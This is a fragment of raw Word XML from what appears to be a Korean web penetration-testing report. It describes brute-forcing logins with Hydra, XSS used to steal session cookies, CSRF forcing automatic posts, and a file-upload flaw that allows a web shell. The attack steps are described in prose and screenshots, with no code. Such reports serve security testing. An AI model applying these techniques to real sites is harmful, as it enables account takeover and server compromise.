        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A15254">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute Forcing </w:t>
      </w:r>
      <w:r w:rsidRPr="00A15254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
      <w:r w:rsidR="00A15254" w:rsidRPr="00A15254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 통해 특정 페이지의 </w:t>
      </w:r>
      <w:r w:rsidR="00A15254" w:rsidRPr="00A15254">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidR="00A15254" w:rsidRPr="00A15254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">및 </w:t>
      </w:r>
      <w:r w:rsidR="00A15254" w:rsidRPr="00A15254">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Password, </w:t>
      </w:r>
      <w:r w:rsidR="00A15254" w:rsidRPr="00A15254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">개인 정보까지 유출될 수 있음 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DA2B752" wp14:editId="165FC033">
            <wp:extent cx="4610100" cy="1798320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="그림 40" descr="https://lh3.googleusercontent.com/3yLbkFUbqEt1Y_fCZQC2Kac6NS0oSNNQwnUi5HXB-yB14W-36tRT9QVSyqmlHvpyktgijBkc4uLhJXPQvuzyamli_igw0AzHqOtxcBWfP3fN4M_fk6_d2xj_oZuVgEmD0OFlaJ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3yLbkFUbqEt1Y_fCZQC2Kac6NS0oSNNQwnUi5HXB-yB14W-36tRT9QVSyqmlHvpyktgijBkc4uLhJXPQvuzyamli_igw0AzHqOtxcBWfP3fN4M_fk6_d2xj_oZuVgEmD0OFlaJH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모의해킹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필요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로그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기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위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상적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방법으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4B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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이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</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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계정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생성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,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후에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se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이용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roxy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서버를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설정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상태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정상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와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응답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P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acket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내용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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로그인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실패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시에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확인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수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있는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문자열을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찾아내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툴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공격할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때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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>사용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488C64" wp14:editId="4C3EC712">
            <wp:extent cx="4602480" cy="312420"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="41" name="그림 41" descr="https://lh6.googleusercontent.com/02r0W1ytGEse1x70ky6RcKyQtwFw_87bTR3FA2OEKT_VyNTCqVZeaX7Qp8ozjHE1Qjmst0vkitVUT-u6wY9J_NNvWEhQmugjtJHAVfejOV846Zzo-eHYGPNA6OUs4WWSAxdouK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02r0W1ytGEse1x70ky6RcKyQtwFw_87bTR3FA2OEKT_VyNTCqVZeaX7Qp8ozjHE1Qjmst0vkitVUT-u6wY9J_NNvWEhQmugjtJHAVfejOV846Zzo-eHYGPNA6OUs4WWSAxdouK5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20C18ACC" wp14:editId="3BF6693C">
            <wp:extent cx="4572000" cy="109437"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="42" name="그림 42" descr="https://lh3.googleusercontent.com/HnqHVvp-ptm1qlmUn7BrjCJj7FbUUw-9u2yA4nLAZ6mcpEejpS97apVbZ7Epz6Vghi16ngaGFXRtiMIg-oMZ4cRq9D8JZeyfjgKkGVsYxBICq4vVQTb0-DH79_R0f6Povv85Vx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HnqHVvp-ptm1qlmUn7BrjCJj7FbUUw-9u2yA4nLAZ6mcpEejpS97apVbZ7Epz6Vghi16ngaGFXRtiMIg-oMZ4cRq9D8JZeyfjgKkGVsYxBICq4vVQTb0-DH79_R0f6Povv85Vx7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91" cy="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41B5611" wp14:editId="17C19C26">
            <wp:extent cx="4610100" cy="145363"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="43" name="그림 43" descr="https://lh4.googleusercontent.com/dZgNuTMSNWe82wCVtImEuKrEpjy2XCib74Dvzjn6CiEbigT0_yysuiCBnisU1Wk_zg_KMW3Kz6C4tneLsQh8GHADfYE1wEZNIxqHUcR4Q8eecXdsqvGiRZtOHl9jBsxEybLqX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dZgNuTMSNWe82wCVtImEuKrEpjy2XCib74Dvzjn6CiEbigT0_yysuiCBnisU1Wk_zg_KMW3Kz6C4tneLsQh8GHADfYE1wEZNIxqHUcR4Q8eecXdsqvGiRZtOHl9jBsxEybLqXGY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1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A15254" w:rsidRDefault="004B76C3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 xml:space="preserve">Hydra </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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사용해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hacker </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정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user1 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정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대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Brute Forcing </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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실시</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, DB</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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일치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Password</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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찾아내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것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CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SS[Cross Site Script] </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22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X</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15254">
        <w:t>SS[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15254">
        <w:t>ross Site Script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 w:rsidRPr="00A15254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15254">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SS[Cross Site Script]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">는 웹 상에서 가장 기초적인 취약점 공격 방법의 일종으로 공격자가 공격하려는 사이트에 스크립트를 넣는 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20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공격에 성공했을 시 사이트에 접속한 사용자는 삽입된 코드를 실행하게 되어 의도치 않은 행동을 수행시키거나 쿠키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션 토큰 등의 민감한 정보를 탈취할 수 있음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D65665E" wp14:editId="6615277F">
            <wp:extent cx="2283382" cy="433857"/>
            <wp:effectExtent l="0" t="0" r="3175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1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F6D3C3" wp14:editId="3B26D7E0">
            <wp:extent cx="2766060" cy="135763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13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>X</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SS </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격을 이용해 게시 글에 J</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ava script</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를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등록해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세션 쿠키 값 획득이 가능한지 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9E9B0DE" wp14:editId="253303C6">
            <wp:extent cx="4373880" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="48" name="그림 48" descr="https://lh4.googleusercontent.com/0ddU3kS39GVdlMQP8toNjjDS8SQzd991P6I8J_w6gmNeaBr4z-tNf9Uq3AGAPdtomU96_FqLa95cBhTHfLhlsh3-LLqZsD59JUKwQ5p__96oebD7ll5CXw1BPctBRFRAxaMHm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0ddU3kS39GVdlMQP8toNjjDS8SQzd991P6I8J_w6gmNeaBr4z-tNf9Uq3AGAPdtomU96_FqLa95cBhTHfLhlsh3-LLqZsD59JUKwQ5p__96oebD7ll5CXw1BPctBRFRAxaMHm6E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 xml:space="preserve">확인 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BT</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 돌아와 웹 서비스를 실행 후 쿠키 값을 저장하기 위한 </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일 생성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5C21D82" wp14:editId="72F2E781">
            <wp:extent cx="4434840" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="49" name="그림 49" descr="https://lh3.googleusercontent.com/7_vWSOT4ykxkNdM0Wz-gIY9y2bnYOeTDOHLF2F6Cb3ikEksLqKNzozNbrK7fIsC5aCvBKtadBjkxFu4ZxoztXECKeTSqpsAD9kPxKstakeeugvF8wlUoea40DwyMa5R8y959y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3.googleusercontent.com/7_vWSOT4ykxkNdM0Wz-gIY9y2bnYOeTDOHLF2F6Cb3ikEksLqKNzozNbrK7fIsC5aCvBKtadBjkxFu4ZxoztXECKeTSqpsAD9kPxKstakeeugvF8wlUoea40DwyMa5R8y959ybN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lastRenderedPageBreak/>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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및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유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업로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76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>게시</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3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세션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저장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파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</w:t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A250993" wp14:editId="79ED4436">
            <wp:extent cx="4358640" cy="1508760"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="50" name="그림 50" descr="https://lh5.googleusercontent.com/J4_0rdfi2OXzJKe_F2eoxpfWiRCBfla-KcOLwDZI4X1Xjqm6ii2l50Hxm2i5bYeBCoUq-FqLn00qqeT8N8WnkzRoqqHeLHXGzAhYCKdxGijUChdaIpQNuUN9ZDD6NTIqzq07NY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5.googleusercontent.com/J4_0rdfi2OXzJKe_F2eoxpfWiRCBfla-KcOLwDZI4X1Xjqm6ii2l50Hxm2i5bYeBCoUq-FqLn00qqeT8N8WnkzRoqqHeLHXGzAhYCKdxGijUChdaIpQNuUN9ZDD6NTIqzq07NYT_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1A2D88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저장된 세션을 적용 후 세션이 유지되는지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B76C3" w:rsidRDefault="004B76C3" w:rsidP="004B76C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A15254" w:rsidRDefault="00A15254">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B76C3" w:rsidRPr="00A15254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Cs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RF[</w:t>
      </w:r>
      <w:r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 w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A15254" w:rsidRPr="00A15254" w:rsidRDefault="00A15254" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A15254">
        <w:t>CSRF [Cross Site Request Forgery]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란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웹 어플리케이션 취약점 중 하나로 사용자가 자신의 의지와 무관하게 공격자가 의도한 행동을 하게 만드는 공격 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방법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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A15254" w:rsidRDefault="00A15254" w:rsidP="00A15254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웹 페이지에 접속한 사용자를 공격자가 의도하는 행동을 하게 만들어 특정 페이지를 보안에 취약하게 한다거나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 등의 작업을 수행할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A15254" w:rsidRPr="00223C5C" w:rsidRDefault="00A15254" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00223C5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모의 해킹 결과</w:t>
      </w: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6A3F72AC" wp14:editId="1F1F0DC6">
            <wp:extent cx="4290060" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="51" name="그림 51" descr="https://lh5.googleusercontent.com/JwzTA3_1-CMLK8w45YthmEWDxohL2ZcnrUDEs0hXqrFQICboD4f_m98GwcaXYp4WG6nV0RLMXae9HQKmho8LcrKIVxnpkIMvp_Xjo8HXrO6VsIfef64QThTO0SEHyVBpomAj7k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JwzTA3_1-CMLK8w45YthmEWDxohL2ZcnrUDEs0hXqrFQICboD4f_m98GwcaXYp4WG6nV0RLMXae9HQKmho8LcrKIVxnpkIMvp_Xjo8HXrO6VsIfef64QThTO0SEHyVBpomAj7kDx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Pr="004B76C3" w:rsidRDefault="004B76C3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4B76C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>회원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정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수정에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자가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의도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로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변경을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시도하려고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했으나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기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비밀번호를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확인하는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과정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포함되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공격이</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76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6C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>어려움</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B76C3" w:rsidRPr="004B76C3" w:rsidRDefault="004B76C3" w:rsidP="004B76C3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58D528A" wp14:editId="75AFA38C">
            <wp:extent cx="4921787" cy="291776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0673" cy="29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C3" w:rsidRDefault="004B76C3" w:rsidP="004B76C3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1D496885" wp14:editId="243B74F5">
            <wp:extent cx="4305300" cy="1211580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="53" name="그림 53" descr="https://lh4.googleusercontent.com/Ng0v_Lfzyhm_FIDpIGiTebXSI5Q8H3QLB6kFHGI8FbAmdnCrrQkBJzuzJsAOLH52crQ-qPyQ4oqGrPRdZwbrr0eDZsPG3g7VxQ2wrFTE4L7g-_kNr8LHiw7eG8DRnsidpTfUCH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4.googleusercontent.com/Ng0v_Lfzyhm_FIDpIGiTebXSI5Q8H3QLB6kFHGI8FbAmdnCrrQkBJzuzJsAOLH52crQ-qPyQ4oqGrPRdZwbrr0eDZsPG3g7VxQ2wrFTE4L7g-_kNr8LHiw7eG8DRnsidpTfUCHlh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글을 게시할 때 넘어가는 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 확인하고 자동 광고가 가능하도록</w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>게시 글 작성 및 업로드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B76C3" w:rsidRPr="004B76C3" w:rsidRDefault="004B76C3" w:rsidP="004B76C3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:wordWrap w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B76C3" w:rsidRDefault="004B76C3" w:rsidP="004B76C3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7F2AAF6" wp14:editId="3395A21E">
            <wp:extent cx="4312920" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56" name="그림 56" descr="https://lh4.googleusercontent.com/B_F94HakZMf6UlUUACHPI5FdFketOB8fZ6t8WDkBhUF9c3k9_K1yrzFYT0KADnWn0y1_ksv1w1m5bxVpkE8uZYf0Wn36ExSF7dy6Fw3dZRoQa4oYhzCEpYlNKCSaBIbhMBtGoc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4.googleusercontent.com/B_F94HakZMf6UlUUACHPI5FdFketOB8fZ6t8WDkBhUF9c3k9_K1yrzFYT0KADnWn0y1_ksv1w1m5bxVpkE8uZYf0Wn36ExSF7dy6Fw3dZRoQa4oYhzCEpYlNKCSaBIbhMBtGockj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3" w:rsidRDefault="004B76C3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B76C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">업로드 된 게시 글을 확인하면 공격자가 원하는 게시 글이 자동으로 등록되는 것을 볼 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223C5C" w:rsidRDefault="00223C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71B" w:rsidRDefault="00A6071B" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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3C5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>파일 업로드 취약점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223C5C" w:rsidRPr="00223C5C" w:rsidRDefault="00223C5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3C5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일 업로드 취약점이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223C5C" w:rsidRDefault="00223C5C" w:rsidP="00223C5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223C5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">악성 </w:t>
      </w:r>
      <w:r w:rsidR="00B35862">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="00223C5C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script (ex: web shell)</w:t>
      </w:r>
      <w:r w:rsidRPr="00223C5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 서버에 전달하여 해당 페이지를 통해 악성 코드가 실행되도록 하는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223C5C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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35862" w:rsidRDefault="00B35862" w:rsidP="00B35862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악성 서버</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 통해 S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>erver Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 탈취하거나 서버 변조 등 웹 서버를 장악할 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35862" w:rsidRPr="00B35862" w:rsidRDefault="00B35862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35862">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모의 해킹 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6071B" w:rsidRDefault="00A6071B" w:rsidP="00A6071B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2A5987" wp14:editId="22B992F2">
            <wp:extent cx="2419350" cy="2063122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6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40" cy="20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6CF606" wp14:editId="242704B2">
            <wp:extent cx="1753637" cy="1990725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6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74" cy="19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C1D52A" wp14:editId="5C1B7935">
            <wp:extent cx="2227811" cy="1542864"/>
            <wp:effectExtent l="0" t="0" r="1270" b="63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6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45" cy="15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CF7F37" wp14:editId="195024A5">
            <wp:extent cx="2485506" cy="522498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6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57" cy="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846015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파일을 업로드하고 게시 판에서 파일을 다운 받으려 하면 다운이 되지만 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Directory Li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ing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 이용해 그 파일 다운 받으려 하면 실행이 되고 파일이 업로드 되는 경로를 알고 있다면 그 경로에 해당하는 U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 접근함으로써 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>web shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">파일을 실행 가능 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6071B" w:rsidRDefault="00A6071B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B76C3" w:rsidRPr="00731CFE" w:rsidRDefault="004B76C3" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
